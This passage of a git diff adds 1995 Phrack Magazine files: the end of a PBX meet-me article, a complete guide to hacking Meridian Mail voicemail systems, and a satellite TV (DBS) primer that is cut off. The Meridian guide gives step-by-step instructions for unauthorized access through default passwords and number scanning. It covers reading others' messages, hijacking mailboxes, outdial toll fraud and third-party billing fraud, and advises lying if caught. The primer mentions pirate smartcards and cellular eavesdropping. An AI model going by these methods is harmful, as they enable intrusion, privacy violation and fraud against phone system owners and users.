+  7. Meet-Me Maximum Hold Time (min):
+  8. Maximum Simultaneous Meet-Me connections:
+  9. Prompt for Access Code Before Meet-Me:
+
+
+                                              Command:_________
+
+-----------------------------------------------------------------------------
+There is online help to guide you to conduct this meet-me.  So go with the
+system on this one.
+
+
+Glossary of Terms
+-----------------
+
+    I have listed some terms you might have trouble with while you are
+playing around with this system, this is nowhere near as many as there are,
+but the most vital are listed below.
+
+Address - 1. The telephone number dialed by a calling party which identifies
+         the party called.  2. A location or destination in a computer
+         program.
+Bell 103 - The North American standard for 300 bps modems.
+Bell 212A - The North American standard for 1200 bps modems.
+Blocking - The process of grouping data into transmission blocks. The
+         inability of a pabx to service connection requests, usually because
+         its switching matrix can only handle a limited number of connections
+         simultaneously.  Blocking occurs if a call request from a user
+         cannot be handled due to an insufficient number of paths through the
+         switching matrix; blocking thus prevents free stations from
+         communicating.
+Borscht - Acronym for the functions that must be performed in the Central
+         office at the subscriber's analog interface of a digital system.
+         (battery, overvoltage, ringing, supervision, coding, hybrid, and
+         test)
+Broadband - A communication system with a large bandwidth.
+Channel - Electronic communications path, usually of 4,000 Hz (voice)
+         bandwidth.
+Crossbar - A type of telephone switch.
+Crossbar Switch - (In PABX technology) a switch that has multiple vertical
+         paths, multiple horizontal paths, and electromagnetically operated
+         mechanical means for connecting any vertical path with any
+         horizontal path.  Modern PABXs often use an electronic version of
+         the crossbar switch.
+Data - In phone systems: any information other than speech or tones.
+Data Set - The telephone companies term for a modem.
+Decoder - A device that converts information into another form of signals.
+         (A DTMF decoder converts dtmf tones to numerical dtmf values)
+Dial Long Line - Special Service device which extends loop signalling
+         distance.
+Digital - Variable as opposed to constant.  Data characters are coded in
+         discrete, separate pulses or signal levels.  Contrast with Analog.
+Duplex - Simultaneous two-way independent transmissions in both directions.
+Echo - A faint return of transmitted data.
+ESS - (Electronic Switching System): A telephone switching machine using
+         electronics, often combined with electro-mechanical crosspoints,
+         and usually with a stored program computer as the control element.
+FCC - (Federal Communications Commission): A government agency that monitors
+         and regulates all use of the electromagnetic spectrum for
+         communications.
+Handshake, Handshaking - A preliminary process that is part of a
+         communications protocol that establishes a data connection.
+Interface - The connection between two separate and distinct mechanical or
+         computerized systems.
+Interoffice Trunks - Shared facilities connecting CO switches.
+Link - A communications circuit.
+Local CO - Central office (end office) capable of switching calls between
+         local subscriber circuits.
+Local Loop - The voice-band channel connecting the subscriber to the central
+         office.
+Logging - Recording data associated with a system.
+Multiplexing - The division of a transmission facility into two or more
+         channels.
+Network - An interconnection of computer systems, terminals, or data
+         communications facilities.
+Parameters - Variables designed for system uses.
+Port - A computer interface capable of attaching a communication protocol.
+PBX or PABX - (Private <Automatic> Branch Exchange) A system providing
+         switching in an office or building.
+Voice PABX - Voice only PABX for voice circuits.
+
+----------------
+
+
+      I hope you could use this information.  If anyone has any questions
+or comments, or is wondering if they can get manuals to this system somehow,
+please feel free to email me, I will assist you as much as my schedule will
+allow.  I would like to thank erikb for telling me to write this, abstract
+thought for pointing out all my spelling errors among other things, panzer
+for everything he has done, and all the dc hackers.
+
+Knowledge is the nemesis of all evil, Digital Anarchy!!!
+Later, and remember to always cover your tracks in anything you do.
+
+
+Armitage
+
+armitage@dhp.com
+
+  finger/email for PGP key if desired.
diff --git a/phrack47/15.txt b/phrack47/15.txt
new file mode 100644
index 0000000..3ad2eea
--- /dev/null
+++ b/phrack47/15.txt
@@ -0,0 +1,229 @@
+                              ==Phrack Magazine==
+
+                 Volume Six, Issue Forty-Seven, File 15 of 22
+
+
+Substance's Complete Guide To Hacking Meridian Mail Systems (VMB) [PART 1]
+--------------------------------------------------------------------------
+
+Feb 1st, 1995  --Made for Phrack
+
+Introduction To Meridian Mail Box Systems
+
+By Substance @ Another Way of Life [hpavc] 5183831369
+
+NOTE1: In case you didn't know VMB stands for Voice Mail Box
+
+NOTE2: This is the information that I have gathered from hacking
+       Meridians, and is not guaranteed to be 100% accurate
+
+NOTE3: Disclaimer : There is none, I did this article to encourage people to
+       go and fuck around with Meridians, so sue me.
+
+------------
+Introduction
+------------
+
+Before we begin, Let's shed a little light on the subject of Meridian.  This
+is one of my favorite VMB systems to hack, because:
+
+Number 1    : There are many Meridian VMB Systems throughout the country, in
+--------      800 exchanges and numbers local to you. You can bet that there
+              are at least 10 - 15 different corporations using Meridian
+              throughout your area code
+
+Number 2    : (The Most Important by far.)  Almost ALL Meridian mails
+--------      use the Mail Box number as the default password. (Unless changed
+              manually)
+
+Number 3    : About 95 percent have outdialing features.  Most don't have long
+--------      distance access, but this can still be very useful for diverting
+              calls, and getting free calls in that area code.
+
+
+Ok, enough light shed on the matter. Let's get to identifying and hacking
+those fuckers!
+
+--------------------------
+Identifying Meridian VMB's
+--------------------------
+
+Most Meridian VMBs just come right out and say exactly what they are.  I'd
+say about 8 out of 10 will just come out, right after it answers and say:
+
+"MERIDIAN MAIL"
+<wait 1 second>
+"MAILBOX?"
+
+or just
+
+"MAILBOX?" (it is ALWAYS a female computer [digitized] voice)
+
+Half the time you will only hear "RIDIAN MAIL". (This must be caused by
+a timing bug in Meridian.)  Once you hear that, write the # down, since
+it may be useful in the future for such things as 3rd party billing
+(more on that later), as a code line or just as a personal VMB.  If you know
+for a fact (or a guess in that matter) that this is a Meridian mailbox but
+when you call it, it just says 'Leave a message' or has someone actually
+talking instructing you to leave a message, then you have reached what might
+be a direct VMB line. These are usually numbers people pay more money for, that
+will give them a direct 800 number instead of going through the "mailbox #"
+part.
+
+These are the best, but probably the hardest to hack, because even though
+(according to a recent poll) about 70% of people are stupid enough to leave
+their mailbox number as their password, if you are serious and want to
+pay that much for a direct line, you are probably going to change the
+password. Even though I have seen many that do have the default, the
+odds are against it.
+
+Ok back to the point.  If you find a direct VMB, call all the numbers around
+it, because chances good are that you will find the system that just asks
+for a box number, very close.  I would recommend about +50 numbers and -50
+numbers and you'll find the root system.  You will also find many other
+direct boxes in your quest.
+
+NOTE: The ROOT SYSTEM is the number you call and simply hear 'MAILBOX' or
+      'MERiDiAN MAiL'
+
+Another thing to remember is that you have to find out how many digits your
+mailbox #'s are going to be.  The number of digits I've seen in my career
+differs from about 2 digits (rare) to 6 (also fairly rare).  The most likely
+# of digits it will probably have is 4, or 5...  Call your VMB and when it asks
+for mailbox #, hit '111#' (Note: You ALWAYS have to end a command on a Meridian
+mail system with an '#') if it says (with a quick response) 'INVALID box #'
+then try a 4 digit code.  Sometimes (yeah, I know it sucks) you will
+have to fuck around for a while before you can tell how many digits, or even
+worse you may never know, and have to keep alternating #'s of digits, until
+you hit a valid box.
+
+Hacking The Fuckers:
+
+First off, think of what you are going to record as an outgoing message before
+you go and hack it.  Decide if this should be a code line, or a personal VMB,
+or... Both?  Here are the first default boxes you should try before dialing
+random ones:
+
+111 222 333 444 555 666 777 888 999 000 100 200 300 400 500
+600 700 800 900 123 234 345 456 567 678 789 890 901 121 212
+etc. etc. etc.
+
+If boxes are 4 digits, add a trailing number.  If you don't know the length,
+mess around a while, you'll get one.
+
+If you call someone's direct VMB and you hear a message like "You have
+reached So&So's VMB please leave a message, and I will return your call as
+soon as possible" there are a few ways to transfer to a different mailbox.
+Try simply hitting #, that might just hang up on you, unfortunately.
+Call back try hitting *.  When you hear 'MAiLBOX' you just struck home.
+Try entering 123#.
+
+Now, a few things can happen. Either:
+
+        1  It will transfer you to 123's mailbox
+        2  It will say invalid mailbox, or simply 'MAILBOX' again
+        3  It will say Password
+
+When you hear 123's mailbox you can try and hack it by hitting *, and hope
+it will ask 'PASSWORD?'  If it doesn't then you can't do much with this
+system except leave messages for that person (What Fun).  If it does ask
+"PASSWORD?" then try the box # as the default password.  (On your quest for a
+valid VMB you will find that MANY MANY people are total fucking morons
+and keep their password at the default) others will make it something easy to
+remember like 123# or 111# etc. etc. etc.  If the password is not the Default
+then just write this number down in a notebook and move on.
+
+If all else fails and you can't figure out how to get to the MAILBOX prompt you
+should call all the #s around the one you found to try and find the root
+system.
+
+
+If you get in, (with the default or otherwise) it will probably say:
+
+'MAILBOX EMPTY' or 'YOU HAVE n MESSAGES'
+
+If you press 7* it will reply with:
+
+Message option 0        (unknown at this time)
+Reply 1                 (used to reply to a previous message)
+Play envelope 2         (unknown at this time)
+Forward 3               (Forward your mail to another box)
+Reply all 4             (Reply with a multi-mail)
+compose 5               (send multi-mail)
+delete 6                (used to delete mail [duh])
+send 9                  (sends single mail [must have mailbox number ready)
+
+
+if you press 8* it will reply with:
+
+Mailbox options 0       (Changes operator code (not useful)
+login 1                 (Gives you the option to transfer mailbox's)
+greeting 2              (Can change greeting (internal & external)
+logoff 3                (Kicks you off the system)
+password change 4       (Changes VMB password [verifies 2x]
+distribution list 5     (Not useful)
+goto 6                  (Takes you back to 'MAILBOX EMPTY'
+Personal verification 9 (Lets you record a name for personal verify)
+to exit press #         (logoff)
+
+This is not all very useful, the most you can do with these commands is listen
+to people's mail (which can be fun), and/or take it over for your own code line
+or personal VMB.  The whole point of hacking Meridians is the outdial function.
+Once you have successfully gotten into the VMB dial '0*' (Zero-Star).
+It should say:
+
+'YOU HAVE REACHED A SYSTEM THAT WILL CONNECT YOU TO THE NUMBER THAT YOU ENTER.
+PLEASE ENTER THE NUMBER OR THE NUMBER OR THE NAME OF THE PERSON YOU WISH TO
+REACH. PRESS 11 FOR A NAME, SPELL THE LAST NAME THEN THE FIRST NAME blah,
+blah, blah.'
+
+This is the jackpot.  With this you can call ANYWHERE (hopefully) for free, any
+time (unless the VMB has hours [...some do...]) To dial out, try this first:
+
+just dial a local number (ex 432-1342#)
+
+>From there it may beep and say 'THAT # CANNOT BE REACHED' or it may connect
+you.  If it connects you, great!  You just found an untraceable way of hacking!
+Call back and try 1-npa/xxx-yyyy (if that works, then abuse the hell out of it
+as soon as possible, because it wont last for long :) )  If those two methods
+don't work try these.
+
+                            9+1+npa/xxx-yyyy  (works most of the time)
+                            8+1+npa/xxx-yyyy  (not probable)
+                            0+1+npa/xxx-yyyy  (Possible)
+                            9+xxx-yyyy
+                            8+xxx-yyyy
+                            0+xxx-yyyy
+
+If none of those work, then you're shit out of luck. Use it for a code line.
+If it did work, think of the possibilities, 900 numbers (for gaining access
+to boards), Tons of free LD, untraceable calls............
+
+On to the last subject of part 1.
+
+------------------------------
+Another Way To Make Free Calls
+------------------------------
+
+Sorry, this only works on Direct VMB's, sometimes only the ones in your local
+exchange, its a long shot, but hell, its free.  (But don't do this from your
+home phone, stupid.)
+
+Change the outgoing message on the direct VMB to 'Operator, this number accepts
+all collect and 3rd party billings'  Call up the operator and ask for AT&T,
+once they come on tell her you would like to make a 3rd party billing.  Tell
+her the number you're billing to is the VMB #, then tell her the number you
+wish to call. She'll say, "wait," AND a few moments later she'll come back
+and say they accepted.  Presto!  You're in!
+
+If you get busted, say you read a text file on how to do it, you didn't think
+it would work... (act innocent, alwayz worked for me :)
+
+
+You can leave me comments, suggestions or threats at my VMB
+(not a Meridian currently)  *(800)775-0728* (direct)...
+
+
+-substance
+
+[EOF]
\ No newline at end of file
diff --git a/phrack47/16.txt b/phrack47/16.txt
new file mode 100644
index 0000000..8b69e45
--- /dev/null
+++ b/phrack47/16.txt
@@ -0,0 +1,870 @@
+ 
+                              ==Phrack Magazine==
+
+                 Volume Six, Issue Forty-Seven, File 16 of 22
+
+[Editor's Note:  This info and much more can be obtained from
+American Hacker Magazine, 3494 Delaware Ave., #123, Buffalo, NY 14217.
+716-874-2088 (voice/fax) 716-871-1915 (bbs) snews@buffnet.net
+$29.95 for 12 issues, including BBS access.  I you are into satellites,
+you might want to check this out!]
+
+
+                 DBS Primer (c) Scrambling News (TM) 1995
+
+Preface
+
+This text lacks the photos and schematics which accompanied
+the article when it appeared in our newsletter. Constructive
+criticism, corrections, and suggestions for information which
+should be added are all welcome. We are snews@buffnet.net
+or 716.874.2088. As always we include information regarding
+gray and black market activity involving the RCA system. The
+big news is that we expect a pirate smartcard to become
+available soon. There is more information about that later in
+the second part of this article.
+
+Brand names and trademarks are used herein for identification
+purposes only and are the property of their respective owners.
+Use of same within this document definitely does not imply agreement
+with or endorsement of the material presented. Information
+published by Scrambling News is intended for educational and
+entertainment purposes only and must not be used for any other
+purpose.
+
+Introduction
+
+We in the middle of an advertising blitz by RCA, DirecTV, USSB
+and Prime star announcing that the age of digitally delivered
+entertainment has arrived. Major newspapers, magazines and
+cable channels are saturated with commercials featuring the
+new RCA DSS 18 inch satellite dishes and all media have done
+their job to promote the new systems.
+
+It is true that we are in the middle of a revolution. Other
+small dish satellite systems are in the development stage,
+the telco's are getting into the cable business, cable is
+testing interactive services, and C/Ku-band satellite TV has
+been around since the late '70s but it too, is in transition.
+In this article we will focus on some aspects of the new
+DirecTV 18 inch dish system. We covered the Videocrypt
+encryption system in a previous article.
+
+GM Hughes DirecTV is a venture involving GM's Delco
+Electronics and Hughes Aircraft. The two have put about
+$750 million into the business while Hubbard Broadcasting,
+a service provider has added $150 million, including $25
+million from Dow Jones. RCA has pledged $100 million. RCA
+has exclusives rights to manufacture the hardware for the
+first 1 million systems. The DSS brand system is owned by
+Thomson Consumer Electronics of Paris. Sony will also
+manufacture the dish and receiver systems after RCA
+sells the first million. They expect to have their system
+on the market in June. The $699 list price of the basic
+system is currently holding firm, because of demand. Thomson
+Consumer Electronics has been offering the systems free to
+purchasers of TCE (RCA) widescreen TV's at Sears, Circuit City,
+etc. in the Denver, LA, Chicago and Atlanta markets. The Thomson/Hughes
+system is unique in offering movies in widescreen format. That
+is why the RCA CinemaScreen TV's have not moved well until now.
+
+GM Hughes DBS system launched this past summer and only rolled
+out nationally in September. By mid October over 100,000 systems
+had been sold. Over 3,000 are now being sold per day and Thomson
+has reported sales of over 500,000 systems as of the week before
+Christmas. This represents sales 10-15% ahead of projections.
+Hughes predicts there will be 3 million systems in use by mid
+1996 and 10 million by the year 2000. The break even point is 3
+million systems. RCA is currently manufacturing 100,000 systems
+/month. GM Hughes is a company which has survived the downsizing
+in the defense industry. Of its $14 billion estimated 1994
+revenue, 41% is derived from its defense business which includes
+Tomahawk cruise missiles. About 37% comes from its automotive
+electronics business which includes air bag sensors, car radios
+and instrument panels, mostly for GM cars. DirecTV is only part
+of the telecommunications division which includes a mobile
+cellular business and the leasing of satellite transponders.
+When GMH has sold 3 million systems. DirecTV will be a $3
+billion/yr business of which $1 billion will be operating
+profit.
+
+Programming
+
+Available Programming is conveniently divided between two
+separate sources, forcing most consumers to subscribe to both.
+The programming carried by DirecTV and USSB is unique to each
+and each has a monopoly. USSB supplies ANC (All News Channel),
+VH1, Lifetime, Nick, Flix, Cinemax, Cinemax2, Cinemax West,
+TMC, TMC West, HBO, HBO2, HBO3, HBO West, Showtime, Showtime2,
+Showtime West, MTV, and the Comedy Channel. The Essentials
+package for $7.95/month includes Lifetime, the Comedy Channel,
+Nick, Nick at Night, MTV, VH-1 and the All-News Channel. A
+package of all HBO and Cinemax feeds costs $10.95. A similar
+package with all Showtime /TMC channels plus Flix also costs
+$10.95. Showtime Plus includes the Showtime/TMC package
+together with Flix and the Essentials package for $24.95.
+Entertainment Plus includes all USSB channels for $34.95/month.
+
+DirecTV supplies the remaining channels and PPV (pay per view)
+programming. All subscribers receive ESPN, the Cartoon channel,
+USA, CNN, Trio (family entertainment and news), Headline News,
+Discovery, C-Span, TNT, TBS, TNN, TCM (Turner Classic Movies),
+Bloomberg Direct (financial news), and MuchMusic (Canadian MTV),
+Disney, and Music Choice (formerly Digital Cable Radio) which
+consists of 28 channels of CD quality commercial-free genre
+music ranging from symphonic to rap.
+
+Personal Choice subscribers may choose 10 additional channels
+from E!, the Weather Channel, Newsworld International (Canadian
+with BBC), Sci-Fi Channel, Court TV, Family and Travel channels,
+C-Span 2, CNN International, the Learning Channel, CNBC, the
+Learning Channel, Country Music Television, A&E, or the Encore
+multiplex which includes Encore plus six channels dedicated to
+love stories, mysteries, westerns, childrens' programming,
+action, and true stories. All the above channels are available
+in the Total Choice package for $29.95. Channels available 
+la carte include Starz for $1.80, Playboy for $9.95 and TV Asia
+for $5.95. A new addition is the Golf Channel on channel 304
+for $6.95/month.
+
+Subscribers to the sports package currently receive eight
+regional sports networks for $7.95/month. These include Home
+Team Sports, Home Sports Entertainment, KBL Sports, Pro Am
+Sports System, Prime Sports, Prime Ticket, SportSouth and
+Sunshine Network. DirecTV says it will expand the number of
+regional networks it carries but no definite plans have been
+announced. Packages including all NHL and NBA games are also
+available. A minimal package which includes only access to
+PPV and Bloomberg Direct costs $5.95 per month.
+
+Approximately 54 channels are devoted to PPV movies and
+there are preview and special events channels as well.
+Approximately 36 movies are available at any given time and
+they cost $2.99 each. Subscribers receive a $2.50 credit
+per month which may be applied to the cost of any PPV or
+special event. DirecTV has just signed an agreement with
+Twentieth Century Fox so its films will also be available on
+PPV.
+
+DirecTV plans to launch DBS-3 late this summer and it will
+add at least 30 more channels. The satellite was originally
+scheduled for launch in December but mechanical problems
+have caused a delay. The two existing satellites provide a
+total capacity of about 175 channels.
+
+Features
+
+The basic $699 system supports only one master TV. That means
+that all televisions in the house must be tuned to the same
+channel. Unlike cable, it is not possible to watch one channel
+in the living room, while the kids watch another in the recroom
+and the wife watches yet a different channel in her coven. The
+deluxe system consists of two receivers and it supports two
+independent television receivers or a TV and a VCR. It consists
+of a dual feed LNB mounted on the 18" dish and two receivers.
+The cost is $899 plus $650 for the second receiver. Both
+receivers have a wideband data port which will supposedly be
+used for HDTV. The deluxe receiver includes a slow speed 9 pin
+port for future data services and a second set of baseband
+audio/video output jacks. Other than these differences and
+the ability to subscribe a second receiver at reduced rates,
+the two receivers are the same.
+
+Those who wish to record programs must leave the receiver on
+the channel to be recorded. It has no ability to change
+channels and it cannot be programed to do so or even to
+turn on at a certain time. According to Thomson, the ability
+of the RCA system to change channels was omitted for
+legal reasons. The rights for recording through the on-screen
+guide belong to StarSight. Their system is available as a
+stand-alone box for cable or over-air use or as an
+integrated part of a television, VCR or C-band satellite
+receiver. It is expected that the time recording feature
+will be added when the legal problems are resolved.
+According to a company spokesman, the lack of the recording
+feature will not hurt initial sales since purchasers will
+be rural and will be more concerned with programming than
+with features. For now, those who wish to have two
+independently controlled TV's or a TV and a VCR must
+purchase the deluxe system. Even then, the second receiver
+must be left on the channel to be recorded.
+
+Local channels are not available from either of the DBS
+services or C-band. In the case of the DBS services, it
+is illegal for them to offer local channels. The FCC
+imposed this regulation so that DBS would not compete with
+over-air services. DirecTV does offer a package of the net
+works including ABC, NBC, CBS, FOX and PBS for $3.95/month.
+It is intended only for those in the "white" areas of the
+country where over-air reception is not possible. Those who
+have subscribed to cable within the last 90 days are not
+eligible to receive it, even if over-air reception is
+impossible. A loophole is that those who live in an area
+where over-air reception is possible may subscribe to the
+network package if over-air reception is not of acceptable
+quality in their own judgement. Typical problems include
+severe ghosting and having reception blocked by mountains
+or buildings, To the best of our knowledge, there is no
+verification process to determine whether a DBS subscriber
+is also a cable subscriber. Those who qualify to subscribe
+to the package will receive ABC from NY, CBS from Raleigh,
+FOX from Chicago, and PBS from Denver. This package costs
+3.95/month.
+
+Both RCA and Primestar receivers include Macrovision copy
+protection chips. Neither system employs them at this time.
+Their use is dictated by copyright holder (movie studio)
+demands. In addition to the studios there is another force
+at work which could, in the future, limit the right of
+individuals to record programs. A draft paper from the
+Information Infrastructure Task Force recommends that
+digital transmission be redefined as a type of distribution
+like publishing, which should be controlled by the copyright
+holders. This proposal, if unchallenged could cause the
+Commerce Department to change copyright laws and make the
+recording of any programming illegal. All products which
+defeat copy protection schemes would become illegal.
+
+The right to purchase and use a VCR is covered by the first
+sale doctrine and was won in the Sony Betamax case in the
+'80s. Americans currently have the right to record programming
+based on both the first sale and fair use doctrines.
+If the ability of consumers to record programming is not
+supported in the future, for whatever reason, DBS subscribers
+will be the first to find out.
+
+The on-screen program guide is a user friendly feature. It
+provides program and movie descriptions up to 24 hours in
+advance using a dedicated button. There are two favorite
+program lists, each of which can store 10 channels. It is
+also possible to choose programs by categories which include
+sports, movies, specials, series, news, and shopping. Accessing
+program information several hours in advance is actually
+quite slow, due to memory limitations, but the feature is
+still valuable.
+
+Other major features of the system are sound and picture quality.
+The sound is of CD quality. Picture quality is superior
+to that available on Video CD's. During the fall there were
+problems with the system. These include freeze frames, which
+caused the picture to freeze for a few seconds, and digital
+artifacts during shot changes. At times the picture would break
+up, leaving large rectangular colored blobs on the screen.
+These problems have decreased considerably during December and
+January and are now infrequent. The DSS system is currently
+using MPEG-1 and will switch over to MPEG-2 later this year.
+This may improve signal quality even more. Changes will be
+made to headend encoders and not to subscribers' equipment.
+
+Installation
+
+The two DSS satellites are co-located in geostationary orbit
+at 101 west longitude. That is over the equator, south of
+Texas. There must be a clear line of sight from the dish to
+the satellite. The signals cannot pass through trees, leaves
+in summer or buildings. The dish may be mounted behind a
+glass window in a patio for example. This can cause reception
+problems during extreme weather. It should not be mounted less
+than 20 feet from overhead power lines.
+
+The dish may be mounted directly on a 1 1/4" I.D. Schedule
+40 (1 5/8" O.D.) preferably galvanized pipe. The system
+includes a mounting foot so it may also be mounted on the
+side of a structure, on a roof or chimney or patio deck.
+The surface must be stationary. Mounting on a roof is
+least desirable. A roof mount can cause damage to the roof
+and cause leaks. Wind loading can cause hundreds of pounds
+of force on the screws securing the mounting foot. Chimney
+mounts kits are also available as an option.
+
+The dish must be grounded where it is mounted and the
+coaxial cable must be grounded using a grounding block
+where it enters the residence. One RG-6 cable is used for
+the connection between the dish and receiver. If the cable
+will be longer than 112 feet, a TVRO bullet amplifier is
+recommended though we have heard of 150 foot runs with no
+problem. Keeping the mounting pole or mounting foot plumb is
+the key to making dish alignment easy, especially for those
+who have no experience installing satellite systems. DSS
+uses an on-screen menu system and homing signal to align
+the dish. A dish which is not plumb negates the value of
+this user-friendly system.
+
+The single best feature of DSS is the setup system. It is
+so user-friendly that even a novice can set the dish up
+himself. It is also this feature which makes the system
+truly portable. No electronic test equipment except a
+television receiver is necessary to align the dish.
+According to DirecTV, more than 40% of purchasers are
+doing their own installations. There is no reason why an
+average person cannot install the system. There are no
+components which can be harmed or destroyed by a botched
+attempt. The worst that can happen is that it might be
+necessary to have someone complete the job.
+
+It is economical to install another dish with an LNBF
+(Low Noise Block amplifier with Feedhorn) at the cottage
+and simply transfer the receiver back and forth. Several
+companies are now manufacturing DBS related products.
+These include a patio style mount, a roof bubble so the
+dish may be aligned from inside the home, and portable DBS
+kits which, in conjunction with a Power inverter, allow
+the dish to be used nearly anywhere in North America.
+
+The setup menu is a sub menu of the main/options menu. The
+dish pointing  menu allows the installer to receive elevation
+and azimuth settings based on either zip code or latitude and
+longitude. Entering the zip code produces a screen which
+provides the elevation setting as marked on the LNB support
+arm. The azimuth or direction setting is the compass reading
+used to point the dish. It is already corrected for magnetic
+deviation. When we installed the system in Buffalo, the screen
+said to set the elevation to 35 and the azimuth to 220.
+
+The computer will not calculate latitude settings greater than
+55 or less than 20, corresponding to locations in Mexico and
+Canada. Some individuals in those regions who are installing
+systems simply project a north to south line on a map to the
+closest US town. Then they call the local U.S. Post Office to
+get the zip code, claiming that they recently moved there but
+can't find their zip code. This will provide the azimuth
+information but not the elevation. The elevation setting on
+the dish changes approximately 1 per degree of change in
+latitude. After the dish has been positioned, the signal
+meter menu is brought up. It is an option on the dish pointing
+menu. There is a homing signal which starts out as a short
+intermittent tone before the signal is locked. As the dish is
+zeroed in on the signal, the tone increases in length until it
+becomes continuous. When moving the dish it is important to
+wait two beeps in order to see and hear the results of the
+movement. It is a common error for installers to continuously
+move the dish around without waiting. In addition to the audible
+tone, the signal meter screen will state how many
+degrees and in what direction the dish should be moved. When
+we installed our dish the screen said to move it 12 west.
+Once the digital signal is locked the screen says "locked
+onto signal."
+
+Once the signal is locked on, the system must be fine tuned.
+This is done by moving the dish east until the signal is
+lost and then to the west. These positions are marked on
+the mounting pole. The dish should then be positioned in
+the center of these two marks. The same is done with the
+elevation setting. Some individuals simply watch the signal
+strength meter and obtain the maximum reading. We had a
+final signal strength of 85 when we set up our dish.
+
+The set up system allows for a large margin of error. The
+original dish settings don't have to be very accurate.
+It is because of the homing signal that anyone can easily
+do the installation. The installer guide which comes with
+the system is very well written and is very helpful. There
+is an accessory kit available which includes a videotape
+covering installation but we don't believe it is necessary.
+It is important to ground the system properly, for safety
+and insurance reasons. The only available free programming
+consists of DirecTV barker channels and Bloomberg Direct
+(business news) on channel 245. Having the board authorized
+takes only a few minutes. USSB provides the first month of
+programming free.
+
+Primestar
+
+Another option for some of those interested in a dish system
+is Primestar. One of the big advantages of Primestar is the
+low startup and maintenance cost. It isn't necessary to
+purchase their equipment. The rental cost is included in the
+monthly fee. Subscribers do not have to pay for future system
+upgrades which will include HDTV. Prices for installation and
+programming packages vary across the country because they are
+set by the individual cable distributors, not Primestar. It is
+possible to purchase a Primestar system for approximately $900
+but there is no financial reason to. Do-it-yourself installations
+are not permitted and range in cost from $149-299.
+
+Primestar was founded in 1990 by GE, Continental Cablevision,
+Cox Cable, Westinghouse Broadcasting, TCI, Time Warner, and
+Comcast Cable. It was the first quasi DBS service and was
+launched on GE's Satcom K-1 Ku-band bird. By 1994 Primestar
+had only signed 70,000 customers in 48 states. Until last
+year it broadcast 11 analog video plus six audio channels in
+the 11.7-12.2 GHz FSS (Fixed Satellite Service) band. Currently,
+Primestar uses 14 transponders powered at 47 watts
+each. Late last year they swapped out their analog B-MAC
+decoders and replaced them with Digicipher 1 decoders.
+There are now more than 100,000 Primestar customers.
+
+Primestar Programming Packages
+
+The Economy Pak, for $29.95 is a 30 channel service which
+includes CNN, C-Span, Discovery, Cartoon Network, Family
+Channel, TLC (The Learning Channel), TBS, TVT, USA, Headline
+News, Prime Sports Network (14 regional sports channels),and
+where available, the nework stations including ABC, NBC, CBS,
+Fox and PBS. The $36.95 Value Pak adds A&E, Country Music TV,
+Lifetime, TNN, Sci-Fi Channel, TCM, Weather Channel, and the
+Encore multiplex. The Family Pak is a 76 channel package
+which includes all of the above and adds three HBO's, two Cine
+max channels and Disney East and West. HBO, Cinemax, Disney
+TV Japan are also available  la carte for $8.95 each. Prime
+Cinema PPV movies cost $4-5 each. X*Press Executive and
+X*Press Change, which offer computer delivered news, sports,
+stock, and entertainment information are also available for
+$59.40/year plus the cost of the computer interface. Primestar
+does not yet have contracts with Viacom so it does not offer
+Showtime/TMC, MTV and Nickelodeon. In March, Playboy, Starz,
+CNNI, QVC, CNBC, and the Golf channels will be added to the
+lineup. Other channels are being negotiated as well, including
+the DMX music service. Primestar is currently limited to
+about 77 channels. A network package from Primestar, for
+those who qualify to receive it, costs $5.95.
+
+The dish used by Primestar is approximately 36 inches in diameter
+while the RCA dish is 18 inches. This may matter in some
+neighborhoods where a dish is considered a blight on the community.
+The size of the Primestar dish precludes it from being
+mounted on a chimney, the side of a house or patio railing for
+example. The system is not portable. While the DSS satellites
+operate at 120 watts of power, Primestar operates at 47 watts
+so it requires a larger dish. On the other hand it does not
+suffer from rain fade problems or the glitches DSS has had.
+
+Primestar does not have an on-screen menu system like DSS does.
+It  carries the Prevue channel which only provides basic pro
+gram information up to 90 minutes in advance. It simply scrolls
+through the channels, and displays only channel and program
+title. Primestar charges $3.95 for PPV movies and the system
+reports monthly purchases via modem, the same way DSS does.
+
+Primestar is somewhat more friendly to those who wish to
+record programming. It has several timers which can be used
+to program the receiver to change channels at a certain time.
+It also has one favorite channel list which can contain any
+number of channels. Both systems have data ports though
+Primestar currently has data services available.
+
+The service is considering a move from its current medium
+power satellite to one or more high power satellites, or it
+may choose to add a high power satellite to the one it has
+now. Either way is promises to offer 150 channels by 1996.
+
+Primestar uses the Digicipher 1 and the picture appears to
+be of slightly higher quality than the DSS picture. The sound
+produced by both systems is excellent. Both systems will be
+upgraded this year. Digicipher 1 IRD's (Integrated Receiver
+Decoders) will be upgraded to the Digicipher II in 1995.
+Customers will receive sidecar modules by mail and will
+simply plug them in. Digicipher II will allow  greater and
+higher quality compression so more channels may be carried.
+While Primestar is using a proprietary compression system
+developed by General Instrument, GI claims that Digicipher
+II can be made MPEG II compatible. DSS is currently using
+MPEG 1 but they will soon upgrade their system to the new
+MPEG II standard. MPEG II is the accepted compression standard.
+According to DirecTV the all necessary modifications
+will be performed to encoders at the headend.
+
+How DBS may Effect C-Band
+
+C-Band systems receive more than just subscription programming.
+There are many channels in the clear (unscrambled) including
+Canadian TV channels offering American sitcoms. The Caribbean
+Superstation, NASA, Main Street TV, E! the Entertainment Channel,
+Court TV, C-SPAN 1 and 2, The Health Channel, Nostalgia,
+America's Talking, National Empowerment TV, The Learning Channel,
+and lots of religious and home shopping channels are all
+available free of charge. With a C/Ku band dish it is possible
+to receive at no cost approximately 120 FM stereo radio stations
+from across the country. This includes jazz from Chicago, Christian
+contemporary from LA, talk radio and nearly any other
+existing format. It is also possible to get backhaul feeds of
+most TV series. Episodes of these series are uplinked a week or
+two before they are broadcast nationally so the cable companies
+have time to insert the commercials which will be shown during
+broadcast. Dish owners who watch the backhaul feeds see a blank
+screen during the time provided for the insertion of commercials.
+In addition, there are live news feeds from all across
+the country. When there is a disaster anywhere in the world it
+is possible to view the live feeds sent to North America by CNN
+et al. In addition, local news departments will uplink certain
+local clips for other stations across the country. It is interesting
+to watch raw news feeds or press conferences in the after
+noon and then see the network anchors apply their spin when
+they narrate the story on the national news.
+
+Those who purchase additional equipment can receive additional
+services. An SCPC receiver costs about $400 and permits users
+to listen to approximately 1500 radio services which are delivered
+by SCPC (single channel per carrier) at frequencies
+lower than those covered by a conventional satellite receiver.
+These include syndicated radio programs like Paul Harvey, base
+ball games, muzak, etc. Using a short wave receiver in conjunction
+with a satellite receiver it is possible to monitor cellular
+phone calls.  Usually only one side of the conversation
+is heard because the other party is on a different frequency.
+Other available services include WEFAX (weather fax) RTTY and
+satellite data. Using special receivers and paying subscription
